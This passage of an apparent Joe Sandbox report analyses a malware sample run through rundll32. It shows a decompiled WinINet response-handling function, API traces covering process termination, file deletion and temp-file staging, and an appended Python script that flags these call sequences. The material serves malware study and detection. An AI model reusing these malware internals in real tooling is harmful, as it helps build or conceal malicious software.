                                • Opcode Fuzzy Hash: d63ebfe1d8bd25e9a1cc3f901ccec614f23ce1514bdf618fda9a4665d8ef616f
                                • Instruction Fuzzy Hash: 8031BC71600305AFDB30DF66C881A97BBEDEF15210F05866BE949DF221D730E945CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                 			E03434A85(void* __ecx, void* __esi) {
                                 				long _v8;
                                 				long _v12;
                                 				long _v16;
                                 				long _v20;
                                 				long _t34;
                                 				long _t39;
                                 				long _t42;
                                 				long _t56;
                                 				void* _t58;
                                 				void* _t59;
                                 				void* _t61;
                                 
                                 				_t61 = __esi;
                                 				_t59 = __ecx;
                                 				/* request context in esi: +0x18 WinINet request handle, +0x1c event handle,
                                 				   +0x28 stored error code, +0x2c HTTP status code (cleared here), +0xc raw header buffer */
                                 				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                 				do {
                                 					/* poll the completion event without blocking (timeout 0) */
                                 					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                 					_v20 = _t34;
                                 					if(_t34 != 0) {
                                 						L3:
                                 						_v8 = 4;
                                 						_v16 = 0;
                                 						/* 0x20000013 = HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE: read the status code as a DWORD into +0x2c */
                                 						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                 							_t39 = GetLastError();
                                 							_v12 = _t39;
                                 							/* 0x2ef3 = ERROR_INTERNET_INCORRECT_HANDLE_STATE: headers not available yet, keep waiting */
                                 							if(_v20 == 0 || _t39 != 0x2ef3) {
                                 								L15:
                                 								return _v12;
                                 							} else {
                                 								goto L11;
                                 							}
                                 						}
                                 						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                 							goto L11;
                                 						} else {
                                 							_v16 = 0;
                                 							_v8 = 0;
                                 							/* 0x16 = HTTP_QUERY_RAW_HEADERS_CRLF: first call with a NULL buffer yields the required length in _v8 */
                                 							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                 							_t58 = E03436D63(_v8 + 1);
                                 							if(_t58 == 0) {
                                 								_v12 = 8;
                                 							} else {
                                 								/* second call copies the raw response headers into the freshly allocated buffer */
                                 								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                 									E03436C2C(_t58);
                                 									_v12 = GetLastError();
                                 								} else {
                                 									 *((char*)(_t58 + _v8)) = 0;
                                 									 *(_t61 + 0xc) = _t58;
                                 								}
                                 							}
                                 							goto L15;
                                 						}
                                 					}
                                 					/* event was already signalled: re-signal it and return any error recorded at +0x28 */
                                 					SetEvent( *(_t61 + 0x1c));
                                 					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                 					_v12 = _t56;
                                 					if(_t56 != 0) {
                                 						goto L15;
                                 					}
                                 					goto L3;
                                 					L11:
                                 					/* wait up to 0xea60 = 60000 ms for the event (see subcall WaitForMultipleObjects) and retry while the wait returns 0 */
                                 					_t42 = E03436E40( *(_t61 + 0x1c), _t59, 0xea60);
                                 					_v12 = _t42;
                                 				} while (_t42 == 0);
                                 				goto L15;
                                 			}

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 03434A9C
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 03434AAC
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03434ADE
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B03
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B23
                                • GetLastError.KERNEL32 ref: 03434B35
                                  • Part of subcall function 03436E40: WaitForMultipleObjects.KERNEL32(00000002,03437BB5,00000000,03437BB5,?,?,?,03437BB5,0000EA60), ref: 03436E5B
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • GetLastError.KERNEL32(00000000), ref: 03434B6A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: 63fa0f5f929695df88c3e98f80975cb3567bddbcf5de0b0e292c2ddc1578e3a5
                                • Instruction ID: 743fa55481ae680e92ab41dda4d62d269d0d98f024749c393f232c7f80398cde
                                • Opcode Fuzzy Hash: 63fa0f5f929695df88c3e98f80975cb3567bddbcf5de0b0e292c2ddc1578e3a5
                                • Instruction Fuzzy Hash: 34310CB5900309EFDB21EFE6C884ADEBBB8EF0D200F1449AAD542EB340D7719A449F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 03478ED3
                                  • Part of subcall function 0347A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5F8
                                  • Part of subcall function 0347A5E7: lstrlen.KERNEL32(?,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5FF
                                  • Part of subcall function 0347A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0347A611
                                  • Part of subcall function 0347A5E7: _snprintf.NTDLL ref: 0347A637
                                  • Part of subcall function 0347A5E7: _snprintf.NTDLL ref: 0347A66B
                                  • Part of subcall function 0347A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0347A688
                                • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 03478F6D
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 03478F8A
                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 03478F92
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 03478FA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                • String ID: s:
                                • API String ID: 2960378068-2363032815
                                • Opcode ID: 43ab7a455d33d4648366dddab8c10384f14798297589ff64211397abf7419e0a
                                • Instruction ID: 09a8781dc7aaca017fc88cd6e1b22e17b8977bbb107ab88d3f226c865c403f07
                                • Opcode Fuzzy Hash: 43ab7a455d33d4648366dddab8c10384f14798297589ff64211397abf7419e0a
                                • Instruction Fuzzy Hash: 5A316F72900209BFDB11EFE9CC85FDFBBFCAB19210F14059AA605EA245E770A6058B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 034713F6
                                • lstrcmpiW.KERNEL32(00000000,?), ref: 0347142E
                                • lstrcmpiW.KERNEL32(?,?), ref: 03471443
                                • lstrlenW.KERNEL32(?), ref: 0347144A
                                • CloseHandle.KERNEL32(?), ref: 03471472
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0347149E
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 034714BC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                • String ID:
                                • API String ID: 1496873005-0
                                • Opcode ID: 9610492521eca8f306f5076bbd1af9aa2f85c79814cfe5a7fa546740af0d0746
                                • Instruction ID: ab8ebfe24e6bd4f8a4503479549e9b6dd590543275c03d604709156bd267cfaf
                                • Opcode Fuzzy Hash: 9610492521eca8f306f5076bbd1af9aa2f85c79814cfe5a7fa546740af0d0746
                                • Instruction Fuzzy Hash: 4F214F71500205BFDB21EFB5DC84E9FB7FCAF15644B19456BA902FE204DB34D9058B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(0347F67C,00000000,0349A420,0349A440,?,?,0347F67C,0348E453,0349A420), ref: 0347F802
                                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0347F818
                                • lstrlen.KERNEL32(0348E453,?,?,0347F67C,0348E453,0349A420), ref: 0347F820
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347F82C
                                • lstrcpy.KERNEL32(0349A420,0347F67C), ref: 0347F842
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0347F67C,0348E453,0349A420), ref: 0347F896
                                • HeapFree.KERNEL32(00000000,0349A420,?,?,0347F67C,0348E453,0349A420), ref: 0347F8A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                • String ID:
                                • API String ID: 1531811622-0
                                • Opcode ID: 135fcd935db9ffe38f085be36fcdb61d2d511cd7e1280eb66d89a26897f6df36
                                • Instruction ID: 6bab6fe411f776fe0219211987afd454c5285cf4d298e8bfede674b9f8368165
                                • Opcode Fuzzy Hash: 135fcd935db9ffe38f085be36fcdb61d2d511cd7e1280eb66d89a26897f6df36
                                • Instruction Fuzzy Hash: 0321C531104244AFEB129F69DC44BABBFEAEF57350F1A409AE844AF215C7319859D7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,03480E77,00000000), ref: 034913DA
                                  • Part of subcall function 03483193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 034831CD
                                  • Part of subcall function 03483193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831DF
                                  • Part of subcall function 03483193: GetTickCount.KERNEL32 ref: 034831EA
                                  • Part of subcall function 03483193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831F6
                                  • Part of subcall function 03483193: lstrcpy.KERNEL32(00000000), ref: 03483210
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(00000000), ref: 03491415
                                • wsprintfA.USER32 ref: 03491428
                                • GetTickCount.KERNEL32 ref: 0349143D
                                • wsprintfA.USER32 ref: 03491452
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                • String ID: "%S"
                                • API String ID: 1152860224-1359967185
                                • Opcode ID: 5845600f48914b6680e56f0a930346cecb90fa576cef296ad216657dc66e5cb1
                                • Instruction ID: e5d89a6bc31c525535cc68fe62f9c2a5db1e151e6bdbd9b431a6706f66d3f3d9
                                • Opcode Fuzzy Hash: 5845600f48914b6680e56f0a930346cecb90fa576cef296ad216657dc66e5cb1
                                • Instruction Fuzzy Hash: 8D11D376501315BFD611FBA69C48EAF7BDCDF89650B15441BF904AF201DB34980187F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,0347314A,00000000), ref: 034797BD
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,0347314A,00000000,00000000,00000004,?,00000000,?), ref: 03479830
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 2078930461-0
                                • Opcode ID: 0fa96404723c51bf95ef0a9987c66e0137c28313b47ec58111207ee42d679332
                                • Instruction ID: b287717af74e8e43f5a5d401fd6cb48723b1047fe267cb1810da752797db6713
                                • Opcode Fuzzy Hash: 0fa96404723c51bf95ef0a9987c66e0137c28313b47ec58111207ee42d679332
                                • Instruction Fuzzy Hash: 9B110431141314BFD6227F22AC49FAF3F9CEB167A1F160267F601BD280D6624858C6E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,0348EA2E,?,76C85520,773BEEF0,?,00000000,0347E842,00000000,0616C310), ref: 034835F5
                                  • Part of subcall function 0348358E: sprintf.NTDLL ref: 03483616
                                • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0347E842,00000000,0616C310), ref: 0348EA40
                                • lstrlen.KERNEL32(?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA48
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • strcpy.NTDLL ref: 0348EA5F
                                • lstrcat.KERNEL32(00000000,?), ref: 0348EA6A
                                  • Part of subcall function 0348C32E: lstrlen.KERNEL32(?,?,?,00000000,?,0348EA79,00000000,?,?,00000000,0347E842,00000000,0616C310), ref: 0348C33F
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA87
                                  • Part of subcall function 0347930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0348EA93,00000000,?,00000000,0347E842,00000000,0616C310), ref: 03479316
                                  • Part of subcall function 0347930C: _snprintf.NTDLL ref: 03479374
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 802417d495ffbd76b5218559cdf2bcfd0f49a97285109c9a5228b91b6b59363a
                                • Instruction ID: bfd1863fed41e6a73230875601a42e1a4ae559fd12060461383bef7054408686
                                • Opcode Fuzzy Hash: 802417d495ffbd76b5218559cdf2bcfd0f49a97285109c9a5228b91b6b59363a
                                • Instruction Fuzzy Hash: 1411863B9017257F4A22FBBA9C88CAF779D9E89950319041BF904AF201DF74CD4257E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SwitchToThread.KERNEL32(?,?,0348E846), ref: 03479EAD
                                • CloseHandle.KERNEL32(?,?,0348E846), ref: 03479EB9
                                • CloseHandle.KERNEL32(00000000,76CDF720,?,03473576,00000000,?,?,?,0348E846), ref: 03479ECB
                                • memset.NTDLL ref: 03479EE2
                                • memset.NTDLL ref: 03479EF9
                                • memset.NTDLL ref: 03479F10
                                • memset.NTDLL ref: 03479F27
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$CloseHandle$SwitchThread
                                • String ID:
                                • API String ID: 3699883640-0
                                • Opcode ID: 3d44a84405222427779e3b5d47c5c1ee2435a867162f6a3b5116d5fc0284de77
                                • Instruction ID: 7896468781751db35d3852f4629699e54da16efdcbd586385d7daa3093918657
                                • Opcode Fuzzy Hash: 3d44a84405222427779e3b5d47c5c1ee2435a867162f6a3b5116d5fc0284de77
                                • Instruction Fuzzy Hash: 4B115435D416206BD512FB26AC04D8F7BED9FE6701B18005BF404BE358C76A462186AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347CAAB
                                • wcstombs.NTDLL ref: 0347CABC
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474975
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,00000020,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474984
                                • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0347CADD
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0347CAEC
                                • CloseHandle.KERNEL32(00000000), ref: 0347CAF3
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0347CB02
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0347CB12
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                • String ID:
                                • API String ID: 417118235-0
                                • Opcode ID: 57ffbee397b0b76464504b1f50a9655e4135e2ece7b9a66efba6486d2b0a5da8
                                • Instruction ID: 10f7b7c4667734642194f1e36da64ca178a49312e2bc5119ba2bf9482010aa1b
                                • Opcode Fuzzy Hash: 57ffbee397b0b76464504b1f50a9655e4135e2ece7b9a66efba6486d2b0a5da8
                                • Instruction Fuzzy Hash: 4E119031100215BBD712AF55DC89FAAB7A8FF15341F240052F905BE285C7B1ED54DBE4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • lstrcpy.KERNEL32(-000000FC,00000000), ref: 034831CD
                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831DF
                                • GetTickCount.KERNEL32 ref: 034831EA
                                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831F6
                                • lstrcpy.KERNEL32(00000000), ref: 03483210
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                • String ID: \Low
                                • API String ID: 1629304206-4112222293
                                • Opcode ID: 0a9c17b0da6f364cb1911dfa7d71725e29b854f6b1e947e354f578342e26eb88
                                • Instruction ID: 79cfe4981b5b00440297efa90137ec23f19ac3c7a3bfc0e95cbd66b39245bf2f
                                • Opcode Fuzzy Hash: 0a9c17b0da6f364cb1911dfa7d71725e29b854f6b1e947e354f578342e26eb88
                                • Instruction Fuzzy Hash: D1019239201624ABD611BBB59C49F6FB7DCEF56E51B190067F500EF244CB24D90187F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wsprintfA.USER32 ref: 03476F64
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 03476F76
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 03476FA0
                                • WaitForMultipleObjects.KERNEL32(00000002,03482EB3,00000000,000000FF), ref: 03476FB3
                                • CloseHandle.KERNEL32(03482EB3), ref: 03476FBC
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                • String ID: 0x%08X
                                • API String ID: 603522830-3182613153
                                • Opcode ID: 24524a8cc3dbe31e1c79336ca850855ef90bcdd8458cddaee2247d6fcf1e49a1
                                • Instruction ID: 6dafa310f7a96a141aedf2ef5de3ca8314ee1329939cf7465617fb6b315dba28
                                • Opcode Fuzzy Hash: 24524a8cc3dbe31e1c79336ca850855ef90bcdd8458cddaee2247d6fcf1e49a1
                                • Instruction Fuzzy Hash: C7014C71901129BFDB00EB90DC4ADEFBFBCEF06260B14425AA515A6189D7709605CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%
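The listings above are raw per-function API traces: the DeleteFileW call bracketed by RtlEnterCriticalSection/RtlLeaveCriticalSection, the OpenProcess(00000001)/TerminateProcess pair, and the CreateWaitableTimerA/SetWaitableTimer/WaitForMultipleObjects sequence that implements a sleep. The Python below is an added example, not code from Joe Sandbox or from the analysed sample: it parses "APIs" lines in the shape this report prints them, reconstructs each function's call sequence, and flags those three ordered sequences. The embedded input is a constructed excerpt of the report, the rule names and the process-access-mask table are assumptions chosen for illustration, and "Part of subcall function" lines are parsed but excluded from matching so that inlined helper calls do not trigger a rule on their own.

```python
import re
from dataclasses import dataclass

# Constructed sample: "APIs" lines in the form the Joe Sandbox IDA plugin emits,
# taken from three of the function listings in this report.
SAMPLE_REPORT = """\
APIs
• RtlEnterCriticalSection.NTDLL(00000000), ref: 034713F6
• lstrcmpiW.KERNEL32(00000000,?), ref: 0347142E
• CloseHandle.KERNEL32(?), ref: 03471472
• DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0347149E
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 034714BC
Memory Dump Source
APIs
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0347CAAB
• wcstombs.NTDLL ref: 0347CABC
  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,0000002E,00000000), ref: 03474975
• OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0347CADD
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0347CAEC
• CloseHandle.KERNEL32(00000000), ref: 0347CAF3
Memory Dump Source
APIs
• wsprintfA.USER32 ref: 03476F64
• CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 03476F76
• SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 03476FA0
• WaitForMultipleObjects.KERNEL32(00000002,03482EB3,00000000,000000FF), ref: 03476FB3
• CloseHandle.KERNEL32(03482EB3), ref: 03476FBC
Memory Dump Source
"""

# One call line: optional "Part of subcall function X:" prefix, API.MODULE,
# optional "(args)", then "ref: ADDRESS". Lines like "wcstombs.NTDLL ref: ..."
# carry no argument list at all, so the parenthesised group is optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class Call:
    api: str
    module: str
    args: list      # hex ints, or None for "?" placeholders
    ref: int        # address of the call site
    subcall: bool   # True for inlined "Part of subcall function" lines

def parse_arg(tok):
    try:
        return int(tok.strip(), 16)
    except ValueError:
        return None

def parse_functions(text):
    """Split the report into per-function call sequences (one per 'APIs' block)."""
    functions, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            functions.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            current.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), bool(m["sub"])))
    return functions

# Subset of the documented PROCESS_* access rights (assumed table for this example).
PROCESS_ACCESS = {
    0x000001: "PROCESS_TERMINATE", 0x000002: "PROCESS_CREATE_THREAD",
    0x000008: "PROCESS_VM_OPERATION", 0x000010: "PROCESS_VM_READ",
    0x000020: "PROCESS_VM_WRITE", 0x000400: "PROCESS_QUERY_INFORMATION",
    0x100000: "SYNCHRONIZE",
}

def decode_access(mask):
    return [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]

# Ordered API sequences that characterise the behaviours seen in the listings.
# Rule names are this example's own labels, not Joe Sandbox signature names.
PATTERNS = {
    "self_delete_under_lock": ("RtlEnterCriticalSection", "DeleteFileW", "RtlLeaveCriticalSection"),
    "terminate_process": ("OpenProcess", "TerminateProcess"),
    "waitable_timer_sleep": ("CreateWaitableTimerA", "SetWaitableTimer", "WaitForMultipleObjects"),
}

def in_order(names, pattern):
    """True if every API in pattern appears in names, in that order (gaps allowed)."""
    it = iter(names)
    return all(p in it for p in pattern)

def scan(functions):
    """Return (rule, first call-site address, detail) for each matching function."""
    findings = []
    for calls in functions:
        own = [c for c in calls if not c.subcall]   # drop inlined subcall noise
        names = [c.api for c in own]
        for label, pattern in PATTERNS.items():
            if not in_order(names, pattern):
                continue
            detail = ""
            if label == "terminate_process":
                op = next(c for c in own if c.api == "OpenProcess")
                if op.args and op.args[0] is not None:
                    detail = "+".join(decode_access(op.args[0]))   # e.g. PROCESS_TERMINATE
            findings.append((label, own[0].ref, detail))
    return findings

if __name__ == "__main__":
    for label, ref, detail in scan(parse_functions(SAMPLE_REPORT)):
        print(f"{label:24s} at 0x{ref:08X} {detail}")
```

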